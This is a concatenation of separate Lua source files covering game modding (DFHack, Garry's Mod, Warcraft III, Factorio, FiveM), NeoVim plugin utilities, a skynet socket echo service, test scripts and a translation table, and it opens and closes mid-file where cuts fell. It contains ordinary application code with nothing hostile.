local wall_material
local shape
local tile_material_enum --holds number or letter if it's predefined
--change to checking for NONE shape/material first, then hidden, then the rest
if designations == nil then
wall_material = "aa"
shape = "w"
elseif designations.hidden then
--set defaults for a hidden block which is WALL and HIDDEN
wall_material = "aa"
shape = "w"
else
local full_x = x_block * 16 + x
local full_y = y_block * 16 + y
local tile_type = dfhack.maps.getTileType(full_x, full_y, z)
local region_x, region_y = dfhack.maps.getTileBiomeRgn(full_x, full_y, z)
local biome_index = getBiomeIndex(biome_xy_cache, region_x, region_y)
if biome_index == nil then --new biome
if region_x ~= nil and region_y ~= nil then
addBiome(biome_xy_cache, biome_layer_cache, biome_lava_stone_cache, region_x, region_y)
biome_index = getBiomeIndex(biome_xy_cache, region_x, region_y)
print("added biome with index: "..biome_index)
end
end
tile_material_enum = tile_type_material_cache[tile_type]
shape = tile_type_shape_cache[tile_type]
if shape == nil then --update tile type caches
local tile_attributes = df.tiletype.attrs[tile_type]
tile_type_shape_cache[tile_type] = OPAL_TileTypeShapeTable[tile_attributes.shape]
tile_type_material_cache[tile_type] = tile_attributes.material
tile_material_enum = tile_type_material_cache[tile_type]
shape = tile_type_shape_cache[tile_type]
if tile_material_enum == nil then
error("Bug at update tile cache. wall material nil at x, y, z "..full_x..", "..full_y..", "..z)
end
if shape == nil then
error("Bug at update tile cache. shape nil at x, y, z "..full_x..", "..full_y..", "..z)
end
end
if shape == "a" then
wall_material = "aa"
elseif shape == "f" then
--wall_material = "aa" --set wall to this, later on when there is a wall and floor material we will deal with the floor material
wall_material = OPAL_TileTypeMaterialTable[tile_material_enum] --wall material has the enum so put that into the material table to see what to do
if wall_material == 1 then --layer material
wall_material = biome_layer_cache[biome_index][designations.geolayer_index]
elseif wall_material == 2 then --lava stone
wall_material = biome_lava_stone_cache[biome_index]
elseif wall_material == 3 then --vein
wall_material = getVeinMaterial(vein_cache[x_block], full_x, full_y) --floors CAN be natural vein materials
if wall_material == nil then
print("floor tile vein is nil at :"..full_x..", "..full_y..", "..z)
--switch to layer
wall_material = biome_layer_cache[biome_index][designations.geolayer_index]
end
end
elseif shape == "w" then
wall_material = OPAL_TileTypeMaterialTable[tile_material_enum] --wall material has the enum so put that into the material table to see what to do
if wall_material == 1 then --layer material
wall_material = biome_layer_cache[biome_index][designations.geolayer_index]
elseif wall_material == 2 then --lava stone
wall_material = biome_lava_stone_cache[biome_index]
elseif wall_material == 3 then --vein
wall_material = getVeinMaterial(vein_cache[x_block], full_x, full_y)
end
--can't use else above because if it's not one of those it must have a pre defined material
else
error("Bug. unknown shape letter")
end
end
--check if any of the letters have changed and deal with it
if wall_material ~= current_wall_material then --material and shape must be done seperate
if current_wall_material ~= " " then --if not default append
wall_material_output = wall_material_output..wall_material_count..current_wall_material
--print(wall_material_count..current_wall_material)
--tile_count = tile_count + wall_material_count
end
current_wall_material = wall_material
wall_material_count = 1
else
wall_material_count = wall_material_count + 1
end
if shape ~= current_shape then
if current_shape ~= " " then
shape_output = shape_output..shape_count..current_shape
end
current_shape = shape
shape_count = 1
else
shape_count = shape_count + 1
end
--tile_count = tile_count + 1
end
end
end
end
wall_material_output = wall_material_output..wall_material_count..current_wall_material --append the last letter and count to proper string
--tile_count = tile_count + wall_material_count
shape_output = shape_output..shape_count..current_shape
writeLayer(wall_material_output, shape_output) --write current output then reset both outputs and all counts and letters
end
writeMaterialTable()
writeShapeTable()
OPAL_file.close()
--local tile_type_shape_count = 0
--for _ in pairs(tile_type_shape) do
-- tile_type_shape_count = tile_type_shape_count + 1
--end
--print("tile_type_material")
--printall(tile_type_material)
--print("tile_type_shape")
--printall(tile_type_shape)
--print("tile_type_shape count: "..tile_type_shape_count)
--print("")
--print("count: "..count)
--print("inorganic table")
--printall(OPAL_InorganicMaterialNumberToString)
printall(OPAL_NaturalMaterialsTable)
--print("tile count: "..tile_count)
print("layer write count: "..OPAL_layer_write_count)
end
args = {...}
--printall(args) --script name is ignored. starting at 1 you see what you typed after the script name
main(args[1])
|
if ( SERVER ) then
AddCSLuaFile( "shared.lua" )
end
if ( CLIENT ) then
SWEP.PrintName = "E-60R Rocket Launcher"
SWEP.Author = "ahnok"
SWEP.ViewModelFOV = 60
SWEP.Slot = 4
SWEP.SlotPos = 1
SWEP.WepSelectIcon = surface.GetTextureID("HUD/killicons/E60R")
killicon.Add( "weapon_jew_e60r", "HUD/killicons/E60R", Color( 255, 80, 0, 255 ) )
end
SWEP.HoldType = "rpg"
SWEP.Base = "tfa_swsft_base"
SWEP.Category = "TFA Star Wars: CIS"
SWEP.Spawnable = true
SWEP.AdminOnly = true
SWEP.ViewModel = "models/weapons/v_E60R.mdl"
SWEP.WorldModel = "models/weapons/w_E60R.mdl"
SWEP.Weight = 20
SWEP.AutoSwitchTo = false
SWEP.AutoSwitchFrom = false
SWEP.Primary.Sound = Sound ("weapons/e60r_rocket_launcher/smartlauncher_fire.wav");
SWEP.Primary.Recoil = 10
SWEP.Primary.Damage = 200
SWEP.Primary.NumShots = 1
SWEP.Primary.Cone = 0.15
SWEP.Primary.ClipSize = 1
SWEP.Primary.Delay = 1
SWEP.Primary.DefaultClip = 3
SWEP.Primary.Automatic = true
SWEP.Primary.Ammo = "rpg_round"
SWEP.Secondary.Automatic = false
SWEP.Secondary.Ammo = "none"
SWEP.ProjectileEntity = "dc17m_at_rocket2" --Entity to shoot
SWEP.ProjectileVelocity = 500 --Entity to shoot's velocity
SWEP.Scoped = true
SWEP.Secondary.UseGreenDuplex = true
SWEP.ScopeScale = 0.6
SWEP.Secondary.IronFOV = 30
|
---[[---------------------------------------------------------------------]]---
-- __ __ _ --
-- ____ ____ / /_ ______ ___ ____ _________ / /_ (_)____ --
-- / __ \/ __ \/ / / / / __ `__ \/ __ \/ ___/ __ \/ __ \/ / ___/ --
-- / /_/ / /_/ / / /_/ / / / / / / /_/ / / / /_/ / / / / / /__ --
-- / .___/\____/_/\__, /_/ /_/ /_/\____/_/ / .___/_/ /_/_/\___/ --
-- /_/ /____/ /_/ --
-- NeoVim configuration which can make your dreams come true. --
---[[---------------------------------------------------------------------]]---
-- polymorphic.modules.built-in.pundle.utils --
-- Useful functions used in pundle --
---[[---------------------------------------------------------------------]]---
-- Author: Mora Unie Youer <mora_unie_youer@riseup.net> --
-- URLs: https://github.com/mora-unie-youer/polymorphic --
-- https://gitlab.com/mora-unie-youer/polymorphic --
-- https://notabug.org/mora-unie-youer/polymorphic --
-- License: MIT --
---[[---------------------------------------------------------------------]]---
local log = require('polymorphic.extras.logging').new({ module = 'pundle' })
local async = require('polymorphic.modules.built-in.async')
local U = {}
local config = nil
function U.config(_config)
config = _config
end
-- Function to set plugin's type ('local' or 'git' for now)
function U.guess_plugin_type(plugin)
-- Checking if plugin name is directory
if vim.fn.isdirectory(vim.fn.expand(plugin[1])) ~= 0 then
-- If directory found - we think it's local plugin
plugin.type = 'local'
plugin.url = plugin[1]
else
-- Otherwise we are using git plugin
plugin.type = 'git'
-- Using GitHub by default
local git_url = plugin.git_url or 'https://github.com/%s.git'
plugin.url = git_url:format(plugin[1])
end
end
-- Returns plugin list according to file system
function U.installed_plugins()
local function look_dir(path)
local plugins = {}
local handle = vim.loop.fs_opendir(path, nil, 50)
if handle then
local items = {}
repeat
items = vim.loop.fs_readdir(handle)
for _, item in ipairs(items or {}) do
table.insert(plugins, ('%s/%s'):format(path, item.name))
end
until not items
end
return plugins
end
return look_dir(config.path .. 'opt'), look_dir(config.path .. 'start')
end
-- Return missing plugin list ((opt + start) - installed)
function U.missing_plugins()
return async(function(opt, start)
local missing = {}
for plugin_full_name, plugin in pairs(config.plugins) do
local plugin_orig_name = plugin_full_name:match('/([%w-_.]+)$')
local plugin_name = (plugin.as or plugin_orig_name)
local plugin_opt = (plugin.opt and 'opt/' or 'start/')
local plugin_path = config.path .. plugin_opt .. plugin_name
local plugin_installed = vim.tbl_contains(
plugin.opt and opt or start,
plugin_path
)
if not plugin_installed then
-- Checking if alias is used
if plugin.as then
local plugin_alt_path = config.path .. plugin_opt .. plugin_orig_name
-- If plugin is installed with original name
if vim.fn.isdirectory(plugin_alt_path) ~= 0 then
log.fmt_debug(
'Renaming installed plugin `%s` to its alias `%s`',
plugin_orig_name,
plugin.as
)
vim.loop.fs_rename(plugin_alt_path, plugin_path)
async():await()
end
else
table.insert(missing, plugin_full_name)
end
end
end
return missing
end)
end
-- Return all plugins list (opt, start and missing)
function U.get_plugins()
return async(function()
local opt, start = U.installed_plugins()
local missing = U.missing_plugins():await(opt, start)
return { missing = missing, start = start, opt = opt }
end)
end
return U
|
local Pattern = require'compe.pattern'
local String = require'compe.utils.string'
local Character = require'compe.utils.character'
local Helper = {}
--- determine
Helper.determine = function(context, option)
option = option or {}
local trigger_character_offset = 0
if option.trigger_characters and context.before_char ~= ' ' then
if vim.tbl_contains(option.trigger_characters, context.before_char) then
trigger_character_offset = context.col
end
end
local keyword_pattern_offset = 0
if option.keyword_pattern then
keyword_pattern_offset = Pattern.get_pattern_offset(context.before_line, option.keyword_pattern)
else
keyword_pattern_offset = Pattern.get_keyword_offset(context)
end
return {
keyword_pattern_offset = keyword_pattern_offset;
trigger_character_offset = trigger_character_offset;
}
end
--- get_keyword_pattern
Helper.get_keyword_pattern = function(filetype)
return Pattern.get_keyword_pattern(filetype)
end
--- get_default_keyword_pattern
Helper.get_default_pattern = function()
return Pattern.get_default_pattern()
end
--- convert_lsp
--
-- This method will convert LSP.CompletionItem.
--
-- Should check following servers.
--
-- - php: $| -> namespace\Class::$variable|
-- - clang: foo.| -> foo->prop|
-- - json: "repository|" -> "repository": {|}
-- - html: "</|>" -> "</div|>"
-- - rust: PathBuf::into_|os_string -> PathBuf::into_boxed_path|
-- - viml: let g:compe.| -> let g:compe.autocomplete|
-- - lua: require'compe|' -> require'compe.utils.character|'
--
Helper.convert_lsp = function(args)
local keyword_pattern_offset = args.keyword_pattern_offset
local context = args.context
local request = args.request
local response = args.response or {}
local complete_items = {}
for _, completion_item in ipairs(response.items or response) do
local word = ''
local abbr = ''
if completion_item.insertTextFormat == 2 then
word = completion_item.label
abbr = completion_item.label
local text = word
if completion_item.textEdit ~= nil then
text = completion_item.textEdit.newText or text
elseif completion_item.insertText ~= nil then
text = completion_item.insertText or text
end
if word ~= text then
abbr = abbr .. '~'
end
word = text
else
word = completion_item.insertText or completion_item.label
abbr = completion_item.label
end
word = String.trim(word)
abbr = String.trim(abbr)
local suggest_offset = args.keyword_pattern_offset
if completion_item.textEdit and completion_item.textEdit.range then
for idx = completion_item.textEdit.range.start.character + 1, args.keyword_pattern_offset - 1 do
if string.byte(context.before_line, idx) == string.byte(word, 1) then
suggest_offset = idx
keyword_pattern_offset = math.min(idx, keyword_pattern_offset)
break
end
end
else
-- TODO: Add tests (compe specific implementation)
local byte_map = String.make_byte_map(word)
for idx = args.keyword_pattern_offset - 1, 1, -1 do
local char = string.byte(context.before_line, idx)
if Character.is_white(char) or not byte_map[char] then
break
end
if Character.is_semantic_index(context.before_line, idx) then
local match = true
for i = 1, math.min(#word, args.keyword_pattern_offset - idx) do
if string.byte(word, i) ~= string.byte(context.before_line, idx + i - 1) then
match = false
break
end
end
if match then
suggest_offset = idx
keyword_pattern_offset = math.min(idx, keyword_pattern_offset)
end
end
end
end
table.insert(complete_items, {
word = word,
abbr = abbr,
kind = vim.lsp.protocol.CompletionItemKind[completion_item.kind] or nil;
user_data = {
compe = {
request_position = request.position;
completion_item = completion_item;
};
};
filter_text = completion_item.filterText or abbr;
sort_text = completion_item.sortText or abbr;
preselect = completion_item.preselect or false;
suggest_offset = suggest_offset;
})
end
local leading = string.sub(context.before_line, keyword_pattern_offset, args.keyword_pattern_offset - 1)
for _, complete_item in ipairs(complete_items) do
complete_item.word = String.get_word(complete_item.word, leading)
end
return {
items = complete_items,
incomplete = response.isIncomplete or false,
keyword_pattern_offset = keyword_pattern_offset;
}
end
return Helper
|
---@class hrect
hrect = {
WORLD_BOUND = cj.GetWorldBounds(),
MAP_INITIAL_PLAYABLE_AREA = cj.Rect(
cj.GetCameraBoundMinX() - cj.GetCameraMargin(CAMERA_MARGIN_LEFT),
cj.GetCameraBoundMinY() - cj.GetCameraMargin(CAMERA_MARGIN_BOTTOM),
cj.GetCameraBoundMaxX() + cj.GetCameraMargin(CAMERA_MARGIN_RIGHT),
cj.GetCameraBoundMaxY() + cj.GetCameraMargin(CAMERA_MARGIN_TOP)
),
MAP_CAMERA_AREA = cj.Rect(
cj.GetCameraBoundMinX(),
cj.GetCameraBoundMinY(),
cj.GetCameraBoundMaxX(),
cj.GetCameraBoundMaxY()
)
}
--- 创建一个设定中心(x,y)创建一个长w宽h的矩形区域
---@param x number
---@param y number
---@param w number
---@param h number
---@param name string
---@return userdata
hrect.create = function(x, y, w, h, name)
local startX = x - (w * 0.5)
local startY = y - (h * 0.5)
local endX = x + (w * 0.5)
local endY = y + (h * 0.5)
local r = cj.Rect(startX, startY, endX, endY)
hcache.alloc(r)
hcache.set(r, CONST_CACHE.RECT_NAME, name)
hcache.set(r, CONST_CACHE.RECT_WIDTH, w)
hcache.set(r, CONST_CACHE.RECT_HEIGHT, h)
hcache.set(r, CONST_CACHE.RECT_X, x)
hcache.set(r, CONST_CACHE.RECT_Y, y)
hcache.set(r, CONST_CACHE.RECT_X_START, startX)
hcache.set(r, CONST_CACHE.RECT_Y_START, startY)
hcache.set(r, CONST_CACHE.RECT_X_END, endX)
hcache.set(r, CONST_CACHE.RECT_Y_END, endY)
return r
end
--- 获取区域名称
---@param whichRect userdata
---@return string
hrect.getName = function(whichRect)
return hcache.get(whichRect, CONST_CACHE.RECT_NAME, '')
end
--- 获取区域中心坐标x
---@param whichRect userdata
---@return number
hrect.getX = function(whichRect)
return hcache.get(whichRect, CONST_CACHE.RECT_X, 0)
end
--- 获取区域中心坐标y
---@param whichRect userdata
---@return number
hrect.getY = function(whichRect)
return hcache.get(whichRect, CONST_CACHE.RECT_Y, 0)
end
--- 获取区域的长
---@param whichRect userdata
---@return number
hrect.getWidth = function(whichRect)
return hcache.get(whichRect, CONST_CACHE.RECT_WIDTH, 0)
end
--- 获取区域的宽
---@param whichRect userdata
---@return number
hrect.getHeight = function(whichRect)
return hcache.get(whichRect, CONST_CACHE.RECT_HEIGHT, 0)
end
--- 获取区域的起点坐标x(左下角)
---@param whichRect userdata
---@return number
hrect.getStartX = function(whichRect)
return hcache.get(whichRect, CONST_CACHE.RECT_X_START, 0)
end
--- 获取区域的起点坐标y(左下角)
---@param whichRect userdata
---@return number
hrect.getStartY = function(whichRect)
return hcache.get(whichRect, CONST_CACHE.RECT_Y_START, 0)
end
--- 获取区域的结束坐标x(右上角)
---@param whichRect userdata
---@return number
hrect.getEndX = function(whichRect)
return hcache.get(whichRect, CONST_CACHE.RECT_X_END, 0)
end
--- 获取区域的结束坐标y(右上角)
---@param whichRect userdata
---@return number
hrect.getEndY = function(whichRect)
return hcache.get(whichRect, CONST_CACHE.RECT_Y_END, 0)
end
--- 删除区域
---@param whichRect userdata
---@param delay number|nil 延时
hrect.del = function(whichRect, delay)
delay = delay or 0
if (delay == nil or delay <= 0) then
hevent.free(whichRect)
hcache.free(whichRect)
cj.RemoveRect(whichRect)
else
htime.setTimeout(delay, function(t)
htime.delTimer(t)
hevent.free(whichRect)
hcache.free(whichRect)
cj.RemoveRect(whichRect)
end)
end
end
--- 区域单位锁定
---@param bean table
hrect.lock = function(bean)
--[[
bean = {
type 类型有:square|circle // 矩形(默)|圆形
during 持续时间 必须大于0
width 锁定活动范围长,大于0
height 锁定活动范围宽,大于0
whichRect 锁定区域时设置,可选
whichUnit 锁定某个单位时设置,可选
whichLoc 锁定某个点时设置,可选
whichX 锁定某个坐标X时设置,可选
whichY 锁定某个坐标Y时设置,可选
}
]]
bean.during = bean.during or 0
if (bean.during <= 0 or (bean.whichRect == nil and (bean.width <= 0 or bean.height <= 0))) then
return
end
if (bean.whichRect == nil and bean.whichUnit == nil and bean.whichLoc == nil
and (bean.whichX == nil or bean.whichY == nil)) then
return
end
if (bean.type == nil) then
bean.type = "square"
end
if (bean.type ~= "square" and bean.type ~= "circle") then
return
end
local inc = 0
local lockGroup = {}
htime.setInterval(0.1, function(t)
inc = inc + 1
if (inc > (bean.during / 0.10)) then
htime.delTimer(t)
hgroup.clear(lockGroup, true, false)
return
end
local x = bean.whichX
local y = bean.whichY
local w = bean.width
local h = bean.height
--点优先
if (bean.whichLoc) then
x = cj.GetLocationX(bean.whichLoc)
y = cj.GetLocationY(bean.whichLoc)
end
--单位优先
if (bean.whichUnit) then
if (his.dead(bean.whichUnit)) then
htime.delTimer(t)
return
end
x = hunit.x(bean.whichUnit)
y = hunit.y(bean.whichUnit)
end
--区域优先
if (bean.whichRect) then
x = cj.GetRectCenterX(bean.whichRect)
y = cj.GetRectCenterY(bean.whichRect)
if (w == nil) then
w = hrect.getWidth(bean.whichRect)
end
if (h == nil) then
h = hrect.getHeight(bean.whichRect)
end
end
local lockRect
local tempGroup
if (bean.type == "square") then
lockRect = cj.Rect(x - (w * 0.5), y - (h * 0.5), x + (w * 0.5), y + (h * 0.5))
tempGroup = hgroup.createByRect(lockRect)
elseif (bean.type == "circle") then
tempGroup = hgroup.createByXY(x, y, math.min(w / 2, h / 2))
end
hgroup.forEach(tempGroup, function(u)
hgroup.addUnit(lockGroup, u)
end)
tempGroup = nil
hgroup.forEach(lockGroup, function(u)
local distance = 0.000
local deg = 0
local xx = hunit.x(u)
local yy = hunit.y(u)
if (bean.type == "square") then
if (his.borderRect(lockRect, xx, yy) == true) then
deg = math.getDegBetweenXY(x, y, xx, yy)
distance = math.getMaxDistanceInRect(w, h, deg)
end
elseif (bean.type == "circle") then
if (math.getDistanceBetweenXY(x, y, xx, yy) > math.min(w / 2, h / 2)) then
deg = math.getDegBetweenXY(x, y, xx, yy)
distance = math.min(w / 2, h / 2)
end
end
if (distance > 0.0) then
local polar = math.polarProjection(x, y, distance, deg)
hunit.portal(u, polar.x, polar.y)
heffect.bindUnit("Abilities\\Spells\\Human\\Defend\\DefendCaster.mdl", u, "origin", 0.2)
end
end)
if (lockRect ~= nil) then
hrect.del(lockRect)
end
end)
end
|
--Always set to false before uploading a release!
DEBUG=false
SHIELD_STEPS_NORMAL = 9
SHIELD_STEPS_LONG = 13
SHIELD_VALUE_ON_PREVIOUS_TICK=2 --in energy units, not shield HP!
HP_BAR=3
ORIENTATION=4
SHIELD_EFFECT_ENTITY=5
SHIELD_VALUE_ON_LAST_TICK=6
ELECTRIC_GRID_INTERFACE=7
TURRET_ENTITY=8
DMG_SINCE_LAST_TICK=9
--Number of ticks before a broken shield is allowed to absorb damage again.
--Used to allow damage to pass through to the entity underneath when a shield breaks.
SHIELD_BROKEN_REGEN_TIME = 10
ENERGY_PER_DMG_POINT = 1000 --1 dmg absorbed = 1 kj energy needed to absorb
GFX_NORMAL_HEIGHT=40
GFX_NORMAL_WIDTH=260
GFX_LIQUID_HEIGHT=40
GFX_LIQUID_WIDTH=388 |
local skynet = require "skynet"
local socket = require "skynet.socket"
local function accept(id, addr)
skynet.error(addr .. " acccepted")
-- 当前服务开始使用套接字
socket.start(id)
local str = socket.read(id)
if (str) then socket.write(id, string.upper(str)) end
-- 不想使用了,这个时候遗弃控制权
socket.abandon(id)
skynet.newservice("socketagent", id, addr)
end
skynet.start(function()
local addr = "0.0.0.0:8083"
local id = socket.listen(addr)
skynet.error("listen -> " .. addr .. " co:", coroutine.running())
assert(id)
socket.start(id, accept)
-- socketabandon
end)
|
local room_more_info_test = require("view/kScreen_1280_800/games/common2/room_more_info_test");
--[[
重连测试、查看子游戏的版本号信息
]]
local RoomMoreInfoTest = class(CommonGameLayer, false);
RoomMoreInfoTest.s_controls =
{
bg = ToolKit.getIndex();
moreView = ToolKit.getIndex();
reconnect_btn = ToolKit.getIndex();
version_btn = ToolKit.getIndex();
version_bg = ToolKit.getIndex();
version = ToolKit.getIndex();
};
RoomMoreInfoTest.ctor = function(self)
super(self, room_more_info_test);
self.m_ctrls = RoomMoreInfoTest.s_controls;
self.m_versionbg = self:findViewById(self.m_ctrls.version_bg);
self.m_versionInfo = self:findViewById(self.m_ctrls.version);
self:setViewVisible(false);
end
RoomMoreInfoTest.dtor = function(self)
self:stopTimer();
end
RoomMoreInfoTest.showView = function(self)
local visible = self:getVisible();
self:setViewVisible(not visible);
end
RoomMoreInfoTest.onTouchBg = function(self)
self:setViewVisible(false);
self.m_versionbg:setVisible(false);
end
-- 请求重连
RoomMoreInfoTest.onTestReconnect = function(self)
self.m_reconnectTime = self.m_reconnectTime or (os.time() - 7);
if os.time() - self.m_reconnectTime < 5 then
Toast.getInstance():showText("亲,您的操作太频繁了,先休息一下吧",50,30,kAlignLeft,"",24,200,175,110);
return;
end
self.m_reconnectTime = os.time();
SocketIsolater.getInstance():reopenSocket();
end
-- 查看游戏的版本号
RoomMoreInfoTest.showGameVerion = function(self)
local visible = self.m_versionbg:getVisible();
local gameId = GameInfoIsolater.getInstance():getCurGameId() or "";
local levelId = GameInfoIsolater.getInstance():getCurRoomLevelId() or "";
local hallVersion = GameInfoIsolater.getInstance():getHallVersion() or 0;
local gameVersion = GameInfoIsolater.getInstance():getGameVersion(gameId) or 0;
local msgnum = MsgProcessTools.getInstance():getSurplusMsgNum();
local isDuring = GameInfoIsolater.getInstance():checkIsDuringDefenseCheatTime() and "true" or "false";
local str = " 游戏ID:%s\n 游戏版本号:%s\n 场次ID:%s\n 大厅版本号:%s\n 防作弊开关:%s\n";
local info = string.format(str,gameId,gameVersion,levelId,hallVersion,isDuring);
self.m_msg = info;
local msg = self.m_msg .. "\n 堆栈消息数量:" .. msgnum
self.m_versionInfo:setText(msg);
self.m_versionbg:setVisible(not visible);
end
RoomMoreInfoTest.startTimer = function(self)
self:stopTimer();
self.m_timer = new(AnimInt, kAnimRepeat, 0, 1, 10, 0);
self.m_timer:setDebugName("RoomMoreInfoTest.startTimer");
self.m_timer:setEvent(self, RoomMoreInfoTest.onTimer);
end
RoomMoreInfoTest.stopTimer = function(self)
if self.m_timer then
delete(self.m_timer);
self.m_timer = nil;
end
end
RoomMoreInfoTest.onTimer = function(self)
if self.m_msg then
local msgnum = MsgProcessTools.getInstance():getSurplusMsgNum();
local msg = self.m_msg .. "\n 堆栈消息数量:" .. msgnum
self.m_versionInfo:setText(msg);
end
end
RoomMoreInfoTest.setViewVisible = function(self,isvisible)
self:setVisible(isvisible);
if not isvisible then
self:stopTimer();
else
self:startTimer();
end
end
RoomMoreInfoTest.refreshPos = function ( self, x, y )
local btnReconnect = self:findViewById(RoomMoreInfoTest.s_controls.reconnect_btn);
local btnVersionInfo = self:findViewById(RoomMoreInfoTest.s_controls.version_btn);
local w, h = btnReconnect:getSize();
btnReconnect:setPos(x - w / 2 - 10, y );
btnVersionInfo:setPos(x + w / 2 + 10, y);
self.m_versionbg:setPos(x + w / 2, y + h + 10);
end
RoomMoreInfoTest.s_controlConfig =
{
[RoomMoreInfoTest.s_controls.bg] = {"bg"};
[RoomMoreInfoTest.s_controls.moreView] = {"moreView"};
[RoomMoreInfoTest.s_controls.reconnect_btn] = {"moreView","reconnect_btn"};
[RoomMoreInfoTest.s_controls.version_btn] = {"moreView","version_btn"};
[RoomMoreInfoTest.s_controls.version_bg] = {"moreView","version_bg"};
[RoomMoreInfoTest.s_controls.version] = {"moreView","version_bg","version"};
};
RoomMoreInfoTest.s_controlFuncMap =
{
[RoomMoreInfoTest.s_controls.bg] = RoomMoreInfoTest.onTouchBg;
[RoomMoreInfoTest.s_controls.reconnect_btn] = RoomMoreInfoTest.onTestReconnect;
[RoomMoreInfoTest.s_controls.version_btn] = RoomMoreInfoTest.showGameVerion;
};
return RoomMoreInfoTest; |
-- Copyright (c) 2021 Trevor Redfern
--
-- This software is released under the MIT License.
-- https://opensource.org/licenses/MIT
return {
COUNT = "STATISTIC_COUNT",
SET = "STATISTIC_SET"
} |
do
---IADS Unit Tests
SKYNET_UNIT_TESTS_NUM_EW_SITES_RED = 18
SKYNET_UNIT_TESTS_NUM_SAM_SITES_RED = 17
--factory method used in multiple unit tests
function IADSContactFactory(unitName)
local contact = Unit.getByName(unitName)
local radarContact = {}
radarContact.object = contact
local iadsContact = SkynetIADSContact:create(radarContact)
iadsContact:refresh()
return iadsContact
end
lu.LuaUnit.run()
--clean mist left over scheduled tasks form unit tests, check there are no left over tasks in the IADS
local i = 0
while i < 10000 do
local id = mist.removeFunction(i)
i = i + 1
if id then
env.info("WARNING: IADS left over Tasks")
end
end
end |
module(..., lunit.testcase, package.seeall)
local common = dofile("common.lua")
local http = require("luanode.http")
local net = require("luanode.net")
-- Verify that the 'upgrade' header causes an 'upgrade' event to be emitted to
-- the HTTP client. This test uses a raw TCP server to better control server
-- behavior.
function test()
-- Create a TCP server
local srv = net.createServer(function(self, c)
local data = ''
c:addListener('data', function(self, d)
data = data .. d
if data:match("\r\n\r\n$") then
c:write('HTTP/1.1 101\r\n' ..
'hello: world\r\n' ..
'connection: upgrade\r\n' ..
'upgrade: websocket\r\n' ..
'\r\n' ..
'nurtzo')
end
end)
c:addListener('end', function()
c:finish()
end)
end)
local gotUpgrade = false
srv:listen(common.PORT, '127.0.0.1', function()
--local hc = http.createClient(common.PORT, '127.0.0.1')
local hc = http.get({ port = common.PORT })
hc:addListener('upgrade', function(self, res, socket, upgradeHead)
-- XXX: This test isn't fantastic, as it assumes that the entire response
-- from the server will arrive in a single data callback
assert_equal('nurtzo', upgradeHead)
for k,v in pairs(res.headers) do
console.log("%s - %s", k, v)
end
for k,v in pairs({ hello="world", connection= "upgrade", upgrade= "websocket" }) do
assert_equal(v, res.headers[k])
end
socket:finish()
srv:close()
gotUpgrade = true
-- Stop propagation and notify node, that "upgrade" event was caught
-- Otherwise socket will be destroyed
return false
end)
--hc:request('GET', '/'):finish()
end)
process:addListener('exit', function()
assert_true(gotUpgrade)
end)
process:loop()
end |
local drpath = require("directories")
drpath.addPath("myprograms",
"ZeroBraineProjects",
"CorporateProjects",
-- When not located in general directory search in projects
"ZeroBraineProjects/dvdlualib",
"ZeroBraineProjects/ExtractWireWiki")
drpath.addBase("D:/LuaIDE")
drpath.addBase("C:/Users/ddobromirov/Documents/Lua-Projs/ZeroBraineIDE").setBase(1)
require("gmodlib")
local common = require("common")
local str = "CURVE"
local tBord = {1}
local vMin = (tBord and tBord[1] or nil) -- Read the minimum and maximum
local vMax = (tBord and tBord[2] or nil)
print(vMin, vMax) |
fx_version 'cerulean'
use_fxv2_oal 'yes'
lua54 'yes'
game 'gta5'
--[[ Original Release ]]
-- author 'snakewiz'
-- description 'A flexible player customization script for FiveM.'
-- repository 'https://github.com/pedr0fontoura/fivem-appearance'
-- version '1.2.2'
author 'Linden'
description 'A flexible player customization script for FiveM.'
repository 'https://github.com/overextended/fivem-appearance/'
version '1.1.0'
client_scripts {
'client/constants.lua',
'client/utils.lua',
'client/customisation.lua',
'client/nui.lua',
'client/main.lua',
'client/outfits.lua',
}
server_scripts {
'@oxmysql/lib/MySQL.lua',
'server/main.lua'
}
files {
'web/build/index.html',
'web/build/static/js/*.js',
'locales/*.json'
}
ui_page 'web/build/index.html'
provides {
'skinchanger',
'esx_skin'
} |
--[[
lang.lua
Copyright (C) 2019 Kano Computing Ltd.
License: http://www.gnu.org/licenses/gpl-2.0.txt GNU GPLv2
Generated translation from 'en_QQ' locale po file
]]--
return {
["letsGo"] = "\239\188\172\239\189\133\239\189\148'\239\189\147 \239\189\135\239\189\143! [\239\188\165\239\188\174\239\188\180\239\188\165\239\188\178]",
["cPowerTitle"] = "\239\188\176\239\189\143\239\189\151\239\189\133\239\189\146",
["binaryborderArea"] = "\239\188\162\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153 \239\188\162\239\189\143\239\189\146\239\189\132\239\189\133\239\189\146",
["mrInfoQuest4"] = "\239\188\168\239\189\137\239\189\135\239\189\136-\239\189\134\239\189\137\239\189\150\239\189\133! \239\188\169\239\189\134 \239\189\153\239\189\143\239\189\149 \239\189\151\239\189\129\239\189\142\239\189\148 \239\189\148\239\189\143 \239\189\132\239\189\137\239\189\147\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\143\239\189\146\239\189\140\239\189\132, \239\189\153\239\189\143\239\189\149 \239\189\147\239\189\136\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\136\239\189\133\239\189\129\239\189\132 \239\189\143\239\189\150\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\172\239\189\143\239\189\135\239\189\137\239\189\131 \239\188\167\239\189\129\239\189\148\239\189\133 \239\188\179\239\189\131\239\189\136\239\189\143\239\189\143\239\189\140.",
["terminalQuestTitle"] = "\239\188\181\239\189\142\239\189\131\239\189\143\239\189\150\239\189\133\239\189\146 \239\188\166\239\189\143\239\189\140\239\189\132\239\189\133\239\189\146\239\189\148\239\189\143\239\189\142 \239\189\141\239\189\153\239\189\147\239\189\148\239\189\133\239\189\146\239\189\153",
["jungleQuizOption1b"] = "\239\188\172\239\189\137\239\189\142\239\189\149\239\189\152 \239\188\175\239\189\144\239\189\133\239\189\146\239\189\129\239\189\148\239\189\137\239\189\142\239\189\135 \239\188\179\239\189\153\239\189\147\239\189\148\239\189\133\239\189\141",
["jungleQuizOption1a"] = "\239\188\172\239\189\137\239\189\147\239\189\148 \239\189\134\239\189\137\239\189\140\239\189\133\239\189\147",
["cPixelsTitle"] = "\239\188\176\239\189\137\239\189\152\239\189\133\239\189\140\239\189\147",
